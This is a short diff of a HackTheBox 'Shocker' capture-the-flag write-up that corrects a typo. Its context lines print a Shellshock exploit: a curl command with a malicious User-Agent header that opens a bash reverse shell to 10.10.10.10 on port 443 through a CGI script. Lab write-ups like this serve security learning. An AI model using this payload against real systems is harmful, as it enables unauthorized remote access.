dw0rsec/CTF-Writeups/HackTheBox/Shocker.md

 ## 💥 Exploitation:

-I used `curl` to exploit the shellshock vulnerability, which gives me back a reverse shell as user `shelly`, so i was able to grab the `user.txt` inside the home dirrectory.
+I used `curl` to exploit the shellshock vulnerability, which gives me back a reverse shell as user `shelly`, so i was able to grab the `user.txt` inside the home directory.

 ```shell
 curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1' http://shocker.htb/cgi-bin/user.sh